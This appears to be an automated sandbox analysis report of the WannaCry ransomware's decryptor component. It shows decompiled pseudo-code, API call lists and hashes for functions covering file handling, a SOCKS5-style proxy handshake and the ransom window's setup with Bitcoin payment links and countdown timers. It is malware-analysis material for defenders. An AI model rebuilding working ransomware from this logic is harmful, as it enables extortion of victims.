                                                      • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1576
                                                      • String ID: 62A
                                                      • API String ID: 1976119259-856450375
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00410A50(intOrPtr* _a4, long _a8, LONG* _a12) {
                                                      				intOrPtr* _t18;
                                                      				intOrPtr _t28;
                                                      				LONG* _t29;
                                                      				LONG* _t35;
                                                      
                                                      				_t18 = _a4;
                                                      				_t28 =  *_t18;
                                                      				if(_t28 == 0) {
                                                      					L12:
                                                      					_t29 = _a12;
                                                      					if(_t29 != 0) {
                                                      						if(_t29 != 1) {
                                                      							if(_t29 == 2) {
                                                      								 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x18)) + _a8;
                                                      							}
                                                      							return 0;
                                                      						} else {
                                                      							 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x1c)) + _a8;
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						 *((intOrPtr*)(_t18 + 0x1c)) = _a8;
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					if( *((intOrPtr*)(_t18 + 1)) == 0) {
                                                      						if(_t28 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							return 0x1d;
                                                      						}
                                                      					} else {
                                                      						_t35 = _a12;
                                                      						if(_t35 != 0) {
                                                      							if(_t35 != 1) {
                                                      								if(_t35 != 2) {
                                                      									return 0x13;
                                                      								} else {
                                                      									_push(_t35);
                                                      									goto L8;
                                                      								}
                                                      							} else {
                                                      								_push(_t35);
                                                      								L8:
                                                      								SetFilePointer( *(_t18 + 4), _a8, 0, ??); // executed
                                                      								return 0;
                                                      							}
                                                      						} else {
                                                      							SetFilePointer( *(_t18 + 4),  *((intOrPtr*)(_t18 + 0xc)) + _a8, _t35, _t35); // executed
                                                      							return 0;
                                                      						}
                                                      					}
                                                      				}
                                                      			}







                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                                      • Instruction ID: 8c7778caab8dc427a0eff36806a54932c8fce05917786e5a19e085de530b5182
                                                      • Opcode Fuzzy Hash: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                                      • Instruction Fuzzy Hash: 3F111C742143019FCB1CCF20C8A4ABB77A2AFE8351F15C55DF08A8B361E674D8859B48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E004109C0(signed int __eax, intOrPtr _a4) {
                                                      				intOrPtr _t10;
                                                      
                                                      				_t10 = _a4;
                                                      				if(_t10 != 0) {
                                                      					_t2 = _t10 + 0x10; // 0x683c247c
                                                      					if( *_t2 != 0) {
                                                      						_t3 = _t10 + 4; // 0x5b5e5fc0
                                                      						FindCloseChangeNotification( *_t3); // executed
                                                      					}
                                                      					_push(_t10);
                                                      					L00412C98();
                                                      					return 0;
                                                      				} else {
                                                      					return __eax | 0xffffffff;
                                                      				}
                                                      			}




                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(5B5E5FC0,?,00410F10,?), ref: 004109D9
                                                      • #825.MFC42(00410F10,?,00410F10,?), ref: 004109E0
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 3896714138-0
                                                      • Opcode ID: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
                                                      • Instruction ID: 03ad0fdb8b1fc462ccda58973351f6a4c3eefe2218a3b6158a688f411921b73e
                                                      • Opcode Fuzzy Hash: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
                                                      • Instruction Fuzzy Hash: 22D02EB2818A204B8E20AF7878106CB3B942E013203094A4AF4A5D7381D264ECC183C4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
                                                      				void* _v0;
                                                      				intOrPtr _v16;
                                                      				signed int _v20;
                                                      				char _v266;
                                                      				char _v267;
                                                      				char _v268;
                                                      				char _v272;
                                                      				char _v280;
                                                      				char _v282;
                                                      				signed int _v283;
                                                      				char _v284;
                                                      				void _v287;
                                                      				void _v288;
                                                      				char _v289;
                                                      				char _v290;
                                                      				char _v291;
                                                      				char _v292;
                                                      				signed int _v296;
                                                      				char _v304;
                                                      				char _v312;
                                                      				char _v313;
                                                      				signed int _v315;
                                                      				char _v323;
                                                      				signed int _v324;
                                                      				signed int _t58;
                                                      				signed int _t65;
                                                      				signed int* _t66;
                                                      				void* _t71;
                                                      				void* _t74;
                                                      				void* _t86;
                                                      				signed int* _t87;
                                                      				void _t89;
                                                      				signed int _t111;
                                                      				signed int _t112;
                                                      				signed int _t117;
                                                      				void* _t127;
                                                      				void* _t132;
                                                      				void* _t141;
                                                      				intOrPtr _t143;
                                                      
                                                      				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
                                                      				if(_t58 != 0) {
                                                      					L24:
                                                      					return _t58 | 0xffffffff;
                                                      				} else {
                                                      					_t141 = _v0;
                                                      					_t89 = 0;
                                                      					_v272 = 0;
                                                      					if(_a8 != 0) {
                                                      						asm("repne scasb");
                                                      						_t89 = 1;
                                                      						_v272 = 1;
                                                      					}
                                                      					_v268 = 5;
                                                      					_v267 = 1;
                                                      					_v266 = 0;
                                                      					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
                                                      					if(_t58 < 0) {
                                                      						L22:
                                                      						_t143 = _a4;
                                                      						if(_t143 > 0) {
                                                      							__imp__#3(_t143); // executed
                                                      						}
                                                      						goto L24;
                                                      					} else {
                                                      						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
                                                      						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
                                                      							goto L22;
                                                      						} else {
                                                      							_v292 = 5;
                                                      							_v291 = 1;
                                                      							_v290 = 0;
                                                      							if(_v16 == 0) {
                                                      								_v289 = 1;
                                                      								_v288 =  *_t141;
                                                      								_t65 = _v20;
                                                      								_v283 = _t65;
                                                      								_v284 = _t65 >> 8;
                                                      								_t66 =  &_v282;
                                                      							} else {
                                                      								_v289 = 3;
                                                      								_t111 = _v296 & 0x000000ff;
                                                      								_v288 = _t89;
                                                      								_t112 = _t111 >> 2;
                                                      								memcpy( &_v287, _t141, _t112 << 2);
                                                      								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
                                                      								_t117 = _v20;
                                                      								 *_t86 = _t117 >> 8;
                                                      								_t87 = _t86 + 1;
                                                      								 *_t87 = _t117;
                                                      								_t66 =  &(_t87[0]);
                                                      							}
                                                      							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
                                                      							if(_t58 < 0) {
                                                      								goto L22;
                                                      							} else {
                                                      								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
                                                      								if(_t58 < 0) {
                                                      									goto L22;
                                                      								} else {
                                                      									_t58 = _v315;
                                                      									if(_t58 != 0) {
                                                      										goto L22;
                                                      									} else {
                                                      										_t71 = _v313 - 1;
                                                      										if(_t71 == 0) {
                                                      											_t127 = _v0;
                                                      											_push(6);
                                                      											goto L19;
                                                      										} else {
                                                      											_t74 = _t71 - 2;
                                                      											if(_t74 == 0) {
                                                      												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
                                                      												_t127 = _v0;
                                                      												_push((_v324 & 0x000000ff) + 2);
                                                      												_push( &_v323);
                                                      												_push(_a4);
                                                      												goto L20;
                                                      											} else {
                                                      												if(_t74 != 1) {
                                                      													L21:
                                                      													return 0;
                                                      												} else {
                                                      													_t127 = _v0;
                                                      													_push(0x12);
                                                      													L19:
                                                      													_push( &_v312);
                                                      													_push(_a4);
                                                      													L20:
                                                      													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
                                                      													if(_t58 < 0) {
                                                      														goto L22;
                                                      													} else {
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}










































                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd

                                                      C-Code - Quality: 100%
                                                      			E00410A10(intOrPtr* _a4) {
                                                      				intOrPtr _t6;
                                                      				long _t10;
                                                      				intOrPtr* _t14;
                                                      
                                                      				_t14 = _a4;
                                                      				_t6 =  *_t14;
                                                      				if(_t6 == 0) {
                                                      					L5:
                                                      					_t5 = _t14 + 0x1c; // 0x40468
                                                      					return  *_t5;
                                                      				} else {
                                                      					_t2 = _t14 + 1; // 0xffffbdf8
                                                      					if( *_t2 == 0) {
                                                      						if(_t6 == 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						_t3 = _t14 + 4; // 0x830000ff
                                                      						_t10 = SetFilePointer( *_t3, 0, 0, 1);
                                                      						_t4 = _t14 + 0xc; // 0x14247c89
                                                      						return _t10 -  *_t4;
                                                      					}
                                                      				}
                                                      			}







                                                      APIs
                                                      • SetFilePointer.KERNELBASE(830000FF,00000000,00000000,00000001,?,00410CBB,?,00000000,?,00000000,FFFFFFFF,?), ref: 00410A2C

                                                      C-Code - Quality: 90%
                                                      			E0040C8F0(intOrPtr* __eax, intOrPtr* _a4, intOrPtr _a8) {
                                                      				intOrPtr* _t5;
                                                      				intOrPtr* _t6;
                                                      				intOrPtr _t7;
                                                      
                                                      				_t5 = __eax;
                                                      				_push(0x18); // executed
                                                      				L00412CEC(); // executed
                                                      				_t6 = _a4;
                                                      				if(_t6 == 0) {
                                                      					_t6 = __eax;
                                                      				}
                                                      				 *_t5 = _t6;
                                                      				_t7 = _a8;
                                                      				if(_t7 == 0) {
                                                      					 *((intOrPtr*)(_t5 + 4)) = _t5;
                                                      					return _t5;
                                                      				} else {
                                                      					 *((intOrPtr*)(_t5 + 4)) = _t7;
                                                      					return _t5;
                                                      				}
                                                      			}







                                                      APIs
                                                      • #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2

                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000), ref: 0040DB71

                                                      C-Code - Quality: 100%
                                                      			E004102B0(int _a8, int _a12) {
                                                      				void* _t4;
                                                      
                                                      				_t4 = calloc(_a8, _a12); // executed
                                                      				return _t4;
                                                      			}





                                                      C-Code - Quality: 100%
                                                      			E004102D0(void* _a8) {
                                                      				void* _t2;
                                                      
                                                      				_t2 = _a8;
                                                      				free(_t2); // executed
                                                      				return _t2;
                                                      			}





                                                      C-Code - Quality: 62%
                                                      			E00406F80(void* __ecx, void* __fp0) {
                                                      				struct HFONT__* _t135;
                                                      				long _t137;
                                                      				long _t138;
                                                      				long _t139;
                                                      				long _t141;
                                                      				long _t142;
                                                      				long _t143;
                                                      				long _t145;
                                                      				long _t146;
                                                      				long _t147;
                                                      				long _t149;
                                                      				void* _t214;
                                                      				int _t216;
                                                      				int _t235;
                                                      				int _t238;
                                                      				int _t240;
                                                      				int _t242;
                                                      				int _t245;
                                                      				int _t248;
                                                      				int _t251;
                                                      				int _t253;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      				int _t339;
                                                      				void* _t348;
                                                      				int _t352;
                                                      				intOrPtr _t355;
                                                      				intOrPtr _t356;
                                                      				intOrPtr _t357;
                                                      				intOrPtr _t358;
                                                      				void* _t359;
                                                      				void* _t360;
                                                      				void* _t361;
                                                      				void* _t375;
                                                      
                                                      				_t375 = __fp0;
                                                      				_push(0xffffffff);
                                                      				_push(E00413E9B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t355;
                                                      				_t356 = _t355 - 0xd4;
                                                      				_t348 = __ecx;
                                                      				_push(0);
                                                      				E004076A0(__ecx);
                                                      				_push(CreateSolidBrush(0xe0));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x121284));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xe000));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xe00000));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x3834d1));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x107c10));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xe8a200));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xd77800));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x3cda));
                                                      				L00412D5E();
                                                      				_t339 = __ecx + 0x880;
                                                      				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                                      				L00412D5E();
                                                      				_t216 = __ecx + 0x888;
                                                      				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                                      				L00412D5E();
                                                      				_t352 = __ecx + 0x890;
                                                      				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t135);
                                                      				L00412D5E();
                                                      				_push(0x3ed);
                                                      				L00412CE6();
                                                      				if(_t339 != 0) {
                                                      					_t339 =  *(_t339 + 4);
                                                      				}
                                                      				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
                                                      				_push(0x3fe);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t235 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t235 = 0;
                                                      				}
                                                      				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
                                                      				_push(0x3fb);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t238 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t238 = 0;
                                                      				}
                                                      				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
                                                      				_push(0x3ff);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t240 =  *(_t352 + 4);
                                                      				} else {
                                                      					_t240 = 0;
                                                      				}
                                                      				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
                                                      				_push(0x3fc);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t242 =  *(_t352 + 4);
                                                      				} else {
                                                      					_t242 = 0;
                                                      				}
                                                      				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
                                                      				_push(0x400);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t245 =  *(_t352 + 4);
                                                      				} else {
                                                      					_t245 = 0;
                                                      				}
                                                      				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
                                                      				_push(0x3fa);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t352 =  *(_t352 + 4);
                                                      				}
                                                      				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
                                                      				_push(0x402);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t248 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t248 = 0;
                                                      				}
                                                      				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
                                                      				_push(0x3ef);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t251 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t251 = 0;
                                                      				}
                                                      				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
                                                      				_push(0x3eb);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t253 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t253 = 0;
                                                      				}
                                                      				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
                                                      				_push(0x3ec);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t216 =  *(_t216 + 4);
                                                      				}
                                                      				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
                                                      				_push(_t348 + 0x5be);
                                                      				L00412DA0();
                                                      				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				_t260 = _t348 + 0x360;
                                                      				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				_push(_t260);
                                                      				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                                      				L00412CAA();
                                                      				_t262 = _t348 + 0x228;
                                                      				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
                                                      				_push(_t262);
                                                      				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                                      				L00412CAA();
                                                      				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
                                                      				L00412DA6();
                                                      				_push(_t348 + 0x58c);
                                                      				_push("mailto:%s");
                                                      				_push(_t356 + 0x10);
                                                      				 *(_t356 + 0xf8) = 0;
                                                      				L00412E00();
                                                      				_t357 = _t356 + 8;
                                                      				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
                                                      				L00412F56();
                                                      				E00404210(_t348 + 0x2f8, _t357 + 0x14);
                                                      				E00404270(_t348 + 0x888);
                                                      				_push( *((intOrPtr*)(_t348 + 0x508)));
                                                      				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
                                                      				_push(_t357 + 0x10);
                                                      				L00412E00();
                                                      				_t358 = _t357 + 8;
                                                      				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
                                                      				L00412F56();
                                                      				E00404210(_t348 + 0x360, _t358 + 0x14);
                                                      				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
                                                      				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				L00412F50();
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				 *( *(_t348 + 0x164)) = 0xe0;
                                                      				( *(_t348 + 0x164))[1] = 0xe000;
                                                      				L00412F50();
                                                      				 *( *(_t348 + 0x1e8)) = 0xe0;
                                                      				( *(_t348 + 0x1e8))[1] = 0xe000;
                                                      				_t342 = _t348 + 0x3c8;
                                                      				E00405820(_t348 + 0x3c8, 1);
                                                      				E00405800(_t348 + 0x3c8, 0xb);
                                                      				E00405200(_t348 + 0x3c8, 0);
                                                      				_push( *(_t348 + 0x824));
                                                      				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
                                                      				E00405860(_t342, 0xb);
                                                      				E004058C0(_t342, 1);
                                                      				E00405990(_t342, 1, 0x20);
                                                      				E00405180(_t342, "00;00;00;00");
                                                      				_t343 = _t348 + 0x444;
                                                      				E00405820(_t348 + 0x444, 1);
                                                      				E00405800(_t348 + 0x444, 0xb);
                                                      				E00405200(_t348 + 0x444, 0);
                                                      				_push( *(_t348 + 0x824));
                                                      				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
                                                      				E00405860(_t343, 0xb);
                                                      				E004058C0(_t343, 1);
                                                      				E00405990(_t343, 1, 0x20);
                                                      				E00405180(_t343, "00;00;00;00");
                                                      				GetTimeZoneInformation(_t358 + 0x38);
                                                      				_push(_t358 + 0x28);
                                                      				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                                      				_t359 = _t358 + 8;
                                                      				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18);
                                                      				_push( *(_t359 + 0x24) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x22) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x20) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x1c) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x26) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x26) & 0x0000ffff);
                                                      				_push("%d/%d/%d %02d:%02d:%02d");
                                                      				_push(_t348 + 0x500);
                                                      				L00412E00();
                                                      				_push(_t359 + 0x48);
                                                      				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                                      				_t360 = _t359 + 0x28;
                                                      				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18);
                                                      				_push( *(_t360 + 0x24) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x22) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x20) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x20) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x26) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x26) & 0x0000ffff);
                                                      				_t214 = _t348 + 0x504;
                                                      				_push("%d/%d/%d %02d:%02d:%02d");
                                                      				_push(_t214);
                                                      				L00412E00();
                                                      				_t361 = _t360 + 0x20;
                                                      				_push(0);
                                                      				L00412E06();
                                                      				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
                                                      				return _t214;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FBC
                                                      • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FCF
                                                      • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FE2
                                                      • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FF5
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407005
                                                      • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407018
                                                      • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040702B
                                                      • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040703E
                                                      • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407051
                                                      • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407064
                                                      • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040709C
                                                      • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 004070CE
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407104
                                                      • #3092.MFC42(000003ED,00000000,?,767B20C0,?), ref: 00407110
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                                      • #3092.MFC42(000003FE,?,767B20C0,?), ref: 00407134
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                                      • #3092.MFC42(000003FB,?,767B20C0,?), ref: 00407156
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                                      • #3092.MFC42(000003FF,?,767B20C0,?), ref: 00407178
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                                      • #3092.MFC42(000003FC,?,767B20C0,?), ref: 0040719A
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                                      • #3092.MFC42(00000400,?,767B20C0,?), ref: 004071BC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                                      • #3092.MFC42(000003FA,?,767B20C0,?), ref: 004071DE
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                                      • #3092.MFC42(00000402,?,767B20C0,?), ref: 004071FC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                                      • #3092.MFC42(000003EF,?,767B20C0,?), ref: 0040721E
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                                      • #3092.MFC42(000003EB,?,767B20C0,?), ref: 00407240
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                                      • #3092.MFC42(000003EC,?,767B20C0,?), ref: 00407262
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                                      • #860.MFC42(?,?,767B20C0,?), ref: 00407288
